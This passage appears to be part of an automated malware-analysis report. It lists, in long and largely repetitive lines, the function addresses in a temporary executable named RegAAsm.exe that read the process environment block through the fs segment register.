              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CD34C mov eax, dword ptr fs:[00000030h]5_2_013CD34C
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148C3CD mov eax, dword ptr fs:[00000030h]5_2_0148C3CD
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014563C0 mov eax, dword ptr fs:[00000030h]5_2_014563C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148B3D0 mov ecx, dword ptr fs:[00000030h]5_2_0148B3D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F33A5 mov eax, dword ptr fs:[00000030h]5_2_013F33A5
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C8397 mov eax, dword ptr fs:[00000030h]5_2_013C8397
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C8397 mov eax, dword ptr fs:[00000030h]5_2_013C8397
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C8397 mov eax, dword ptr fs:[00000030h]5_2_013C8397
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148F3E6 mov eax, dword ptr fs:[00000030h]5_2_0148F3E6
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F438F mov eax, dword ptr fs:[00000030h]5_2_013F438F
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F438F mov eax, dword ptr fs:[00000030h]5_2_013F438F
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CE388 mov eax, dword ptr fs:[00000030h]5_2_013CE388
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CE388 mov eax, dword ptr fs:[00000030h]5_2_013CE388
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CE388 mov eax, dword ptr fs:[00000030h]5_2_013CE388
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A53FC mov eax, dword ptr fs:[00000030h]5_2_014A53FC
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014063FF mov eax, dword ptr fs:[00000030h]5_2_014063FF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EE3F0 mov eax, dword ptr fs:[00000030h]5_2_013EE3F0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EE3F0 mov eax, dword ptr fs:[00000030h]5_2_013EE3F0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EE3F0 mov eax, dword ptr fs:[00000030h]5_2_013EE3F0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A539D mov eax, dword ptr fs:[00000030h]5_2_014A539D
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E03E9 mov eax, dword ptr fs:[00000030h]5_2_013E03E9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E03E9 mov eax, dword ptr fs:[00000030h]5_2_013E03E9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E03E9 mov eax, dword ptr fs:[00000030h]5_2_013E03E9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E03E9 mov eax, dword ptr fs:[00000030h]5_2_013E03E9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E03E9 mov eax, dword ptr fs:[00000030h]5_2_013E03E9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E03E9 mov eax, dword ptr fs:[00000030h]5_2_013E03E9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E03E9 mov eax, dword ptr fs:[00000030h]5_2_013E03E9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E03E9 mov eax, dword ptr fs:[00000030h]5_2_013E03E9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0142739A mov eax, dword ptr fs:[00000030h]5_2_0142739A
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0142739A mov eax, dword ptr fs:[00000030h]5_2_0142739A
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014033A0 mov eax, dword ptr fs:[00000030h]5_2_014033A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014033A0 mov eax, dword ptr fs:[00000030h]5_2_014033A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DA3C0 mov eax, dword ptr fs:[00000030h]5_2_013DA3C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DA3C0 mov eax, dword ptr fs:[00000030h]5_2_013DA3C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DA3C0 mov eax, dword ptr fs:[00000030h]5_2_013DA3C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DA3C0 mov eax, dword ptr fs:[00000030h]5_2_013DA3C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DA3C0 mov eax, dword ptr fs:[00000030h]5_2_013DA3C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DA3C0 mov eax, dword ptr fs:[00000030h]5_2_013DA3C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D83C0 mov eax, dword ptr fs:[00000030h]5_2_013D83C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D83C0 mov eax, dword ptr fs:[00000030h]5_2_013D83C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D83C0 mov eax, dword ptr fs:[00000030h]5_2_013D83C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D83C0 mov eax, dword ptr fs:[00000030h]5_2_013D83C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01458243 mov eax, dword ptr fs:[00000030h]5_2_01458243
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01458243 mov ecx, dword ptr fs:[00000030h]5_2_01458243
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C823B mov eax, dword ptr fs:[00000030h]5_2_013C823B
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140724D mov eax, dword ptr fs:[00000030h]5_2_0140724D
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145D250 mov ecx, dword ptr fs:[00000030h]5_2_0145D250
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148B256 mov eax, dword ptr fs:[00000030h]5_2_0148B256
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148B256 mov eax, dword ptr fs:[00000030h]5_2_0148B256
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149D26B mov eax, dword ptr fs:[00000030h]5_2_0149D26B
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149D26B mov eax, dword ptr fs:[00000030h]5_2_0149D26B
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01411270 mov eax, dword ptr fs:[00000030h]5_2_01411270
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01411270 mov eax, dword ptr fs:[00000030h]5_2_01411270
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01480274 mov eax, dword ptr fs:[00000030h]5_2_01480274
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01480274 mov eax, dword ptr fs:[00000030h]5_2_01480274
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01480274 mov eax, dword ptr fs:[00000030h]5_2_01480274
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01480274 mov eax, dword ptr fs:[00000030h]5_2_01480274
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01480274 mov eax, dword ptr fs:[00000030h]5_2_01480274
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01480274 mov eax, dword ptr fs:[00000030h]5_2_01480274
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01480274 mov eax, dword ptr fs:[00000030h]5_2_01480274
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01480274 mov eax, dword ptr fs:[00000030h]5_2_01480274
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01480274 mov eax, dword ptr fs:[00000030h]5_2_01480274
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01480274 mov eax, dword ptr fs:[00000030h]5_2_01480274
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01480274 mov eax, dword ptr fs:[00000030h]5_2_01480274
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01480274 mov eax, dword ptr fs:[00000030h]5_2_01480274
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01407208 mov eax, dword ptr fs:[00000030h]5_2_01407208
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01407208 mov eax, dword ptr fs:[00000030h]5_2_01407208
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F9274 mov eax, dword ptr fs:[00000030h]5_2_013F9274
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C826B mov eax, dword ptr fs:[00000030h]5_2_013C826B
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D4260 mov eax, dword ptr fs:[00000030h]5_2_013D4260
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D4260 mov eax, dword ptr fs:[00000030h]5_2_013D4260
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D4260 mov eax, dword ptr fs:[00000030h]5_2_013D4260
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D6259 mov eax, dword ptr fs:[00000030h]5_2_013D6259
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CA250 mov eax, dword ptr fs:[00000030h]5_2_013CA250
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A5227 mov eax, dword ptr fs:[00000030h]5_2_014A5227
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C9240 mov eax, dword ptr fs:[00000030h]5_2_013C9240
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C9240 mov eax, dword ptr fs:[00000030h]5_2_013C9240
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E02A0 mov eax, dword ptr fs:[00000030h]5_2_013E02A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E02A0 mov eax, dword ptr fs:[00000030h]5_2_013E02A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E52A0 mov eax, dword ptr fs:[00000030h]5_2_013E52A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E52A0 mov eax, dword ptr fs:[00000030h]5_2_013E52A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E52A0 mov eax, dword ptr fs:[00000030h]5_2_013E52A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E52A0 mov eax, dword ptr fs:[00000030h]5_2_013E52A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED mov eax, dword ptr fs:[00000030h]5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED mov eax, dword ptr fs:[00000030h]5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED mov eax, dword ptr fs:[00000030h]5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED mov eax, dword ptr fs:[00000030h]5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED mov eax, dword ptr fs:[00000030h]5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED mov eax, dword ptr fs:[00000030h]5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED mov eax, dword ptr fs:[00000030h]5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED mov eax, dword ptr fs:[00000030h]5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED mov eax, dword ptr fs:[00000030h]5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED mov eax, dword ptr fs:[00000030h]5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED mov eax, dword ptr fs:[00000030h]5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED mov eax, dword ptr fs:[00000030h]5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED mov eax, dword ptr fs:[00000030h]5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED mov eax, dword ptr fs:[00000030h]5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A52E2 mov eax, dword ptr fs:[00000030h]5_2_014A52E2
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148F2F8 mov eax, dword ptr fs:[00000030h]5_2_0148F2F8
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C92FF mov eax, dword ptr fs:[00000030h]5_2_013C92FF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140E284 mov eax, dword ptr fs:[00000030h]5_2_0140E284
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140E284 mov eax, dword ptr fs:[00000030h]5_2_0140E284
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01450283 mov eax, dword ptr fs:[00000030h]5_2_01450283
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01450283 mov eax, dword ptr fs:[00000030h]5_2_01450283
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01450283 mov eax, dword ptr fs:[00000030h]5_2_01450283
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A5283 mov eax, dword ptr fs:[00000030h]5_2_014A5283
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140329E mov eax, dword ptr fs:[00000030h]5_2_0140329E
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140329E mov eax, dword ptr fs:[00000030h]5_2_0140329E
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E02E1 mov eax, dword ptr fs:[00000030h]5_2_013E02E1
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E02E1 mov eax, dword ptr fs:[00000030h]5_2_013E02E1
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E02E1 mov eax, dword ptr fs:[00000030h]5_2_013E02E1
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014662A0 mov eax, dword ptr fs:[00000030h]5_2_014662A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014662A0 mov ecx, dword ptr fs:[00000030h]5_2_014662A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014662A0 mov eax, dword ptr fs:[00000030h]5_2_014662A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014662A0 mov eax, dword ptr fs:[00000030h]5_2_014662A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014662A0 mov eax, dword ptr fs:[00000030h]5_2_014662A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014662A0 mov eax, dword ptr fs:[00000030h]5_2_014662A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014672A0 mov eax, dword ptr fs:[00000030h]5_2_014672A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014672A0 mov eax, dword ptr fs:[00000030h]5_2_014672A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FF2D0 mov eax, dword ptr fs:[00000030h]5_2_013FF2D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FF2D0 mov eax, dword ptr fs:[00000030h]5_2_013FF2D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014992A6 mov eax, dword ptr fs:[00000030h]5_2_014992A6
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014992A6 mov eax, dword ptr fs:[00000030h]5_2_014992A6
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014992A6 mov eax, dword ptr fs:[00000030h]5_2_014992A6
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014992A6 mov eax, dword ptr fs:[00000030h]5_2_014992A6
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CB2D3 mov eax, dword ptr fs:[00000030h]5_2_013CB2D3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CB2D3 mov eax, dword ptr fs:[00000030h]5_2_013CB2D3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CB2D3 mov eax, dword ptr fs:[00000030h]5_2_013CB2D3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D92C5 mov eax, dword ptr fs:[00000030h]5_2_013D92C5
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D92C5 mov eax, dword ptr fs:[00000030h]5_2_013D92C5
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014592BC mov eax, dword ptr fs:[00000030h]5_2_014592BC
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014592BC mov eax, dword ptr fs:[00000030h]5_2_014592BC
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014592BC mov ecx, dword ptr fs:[00000030h]5_2_014592BC
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014592BC mov ecx, dword ptr fs:[00000030h]5_2_014592BC
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DA2C3 mov eax, dword ptr fs:[00000030h]5_2_013DA2C3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DA2C3 mov eax, dword ptr fs:[00000030h]5_2_013DA2C3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DA2C3 mov eax, dword ptr fs:[00000030h]5_2_013DA2C3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DA2C3 mov eax, dword ptr fs:[00000030h]5_2_013DA2C3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DA2C3 mov eax, dword ptr fs:[00000030h]5_2_013DA2C3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FB2C0 mov eax, dword ptr fs:[00000030h]5_2_013FB2C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FB2C0 mov eax, dword ptr fs:[00000030h]5_2_013FB2C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FB2C0 mov eax, dword ptr fs:[00000030h]5_2_013FB2C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FB2C0 mov eax, dword ptr fs:[00000030h]5_2_013FB2C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FB2C0 mov eax, dword ptr fs:[00000030h]5_2_013FB2C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FB2C0 mov eax, dword ptr fs:[00000030h]5_2_013FB2C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FB2C0 mov eax, dword ptr fs:[00000030h]5_2_013FB2C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FE53E mov eax, dword ptr fs:[00000030h]5_2_013FE53E
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FE53E mov eax, dword ptr fs:[00000030h]5_2_013FE53E
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FE53E mov eax, dword ptr fs:[00000030h]5_2_013FE53E
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FE53E mov eax, dword ptr fs:[00000030h]5_2_013FE53E
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FE53E mov eax, dword ptr fs:[00000030h]5_2_013FE53E
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DD534 mov eax, dword ptr fs:[00000030h]5_2_013DD534
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DD534 mov eax, dword ptr fs:[00000030h]5_2_013DD534
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DD534 mov eax, dword ptr fs:[00000030h]5_2_013DD534
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DD534 mov eax, dword ptr fs:[00000030h]5_2_013DD534
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DD534 mov eax, dword ptr fs:[00000030h]5_2_013DD534
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DD534 mov eax, dword ptr fs:[00000030h]5_2_013DD534
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E0535 mov eax, dword ptr fs:[00000030h]5_2_013E0535
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E0535 mov eax, dword ptr fs:[00000030h]5_2_013E0535
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E0535 mov eax, dword ptr fs:[00000030h]5_2_013E0535
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E0535 mov eax, dword ptr fs:[00000030h]5_2_013E0535
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E0535 mov eax, dword ptr fs:[00000030h]5_2_013E0535
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E0535 mov eax, dword ptr fs:[00000030h]5_2_013E0535
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140656A mov eax, dword ptr fs:[00000030h]5_2_0140656A
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140656A mov eax, dword ptr fs:[00000030h]5_2_0140656A
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140656A mov eax, dword ptr fs:[00000030h]5_2_0140656A
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140B570 mov eax, dword ptr fs:[00000030h]5_2_0140B570
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140B570 mov eax, dword ptr fs:[00000030h]5_2_0140B570
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01407505 mov eax, dword ptr fs:[00000030h]5_2_01407505
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01407505 mov ecx, dword ptr fs:[00000030h]5_2_01407505
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A4500 mov eax, dword ptr fs:[00000030h]5_2_014A4500
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A4500 mov eax, dword ptr fs:[00000030h]5_2_014A4500
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A4500 mov eax, dword ptr fs:[00000030h]5_2_014A4500
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A4500 mov eax, dword ptr fs:[00000030h]5_2_014A4500
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A4500 mov eax, dword ptr fs:[00000030h]5_2_014A4500
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A4500 mov eax, dword ptr fs:[00000030h]5_2_014A4500
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A4500 mov eax, dword ptr fs:[00000030h]5_2_014A4500
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CB562 mov eax, dword ptr fs:[00000030h]5_2_013CB562
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147F525 mov eax, dword ptr fs:[00000030h]5_2_0147F525
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147F525 mov eax, dword ptr fs:[00000030h]5_2_0147F525
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147F525 mov eax, dword ptr fs:[00000030h]5_2_0147F525
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147F525 mov eax, dword ptr fs:[00000030h]5_2_0147F525
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147F525 mov eax, dword ptr fs:[00000030h]5_2_0147F525
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147F525 mov eax, dword ptr fs:[00000030h]5_2_0147F525
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147F525 mov eax, dword ptr fs:[00000030h]5_2_0147F525
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148B52F mov eax, dword ptr fs:[00000030h]5_2_0148B52F
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D8550 mov eax, dword ptr fs:[00000030h]5_2_013D8550
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D8550 mov eax, dword ptr fs:[00000030h]5_2_013D8550
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140D530 mov eax, dword ptr fs:[00000030h]5_2_0140D530
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140D530 mov eax, dword ptr fs:[00000030h]5_2_0140D530
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A5537 mov eax, dword ptr fs:[00000030h]5_2_014A5537
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014055C0 mov eax, dword ptr fs:[00000030h]5_2_014055C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A55C9 mov eax, dword ptr fs:[00000030h]5_2_014A55C9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F45B1 mov eax, dword ptr fs:[00000030h]5_2_013F45B1
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F45B1 mov eax, dword ptr fs:[00000030h]5_2_013F45B1
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140E5CF mov eax, dword ptr fs:[00000030h]5_2_0140E5CF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140E5CF mov eax, dword ptr fs:[00000030h]5_2_0140E5CF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FF5B0 mov eax, dword ptr fs:[00000030h]5_2_013FF5B0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FF5B0 mov eax, dword ptr fs:[00000030h]5_2_013FF5B0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FF5B0 mov eax, dword ptr fs:[00000030h]5_2_013FF5B0
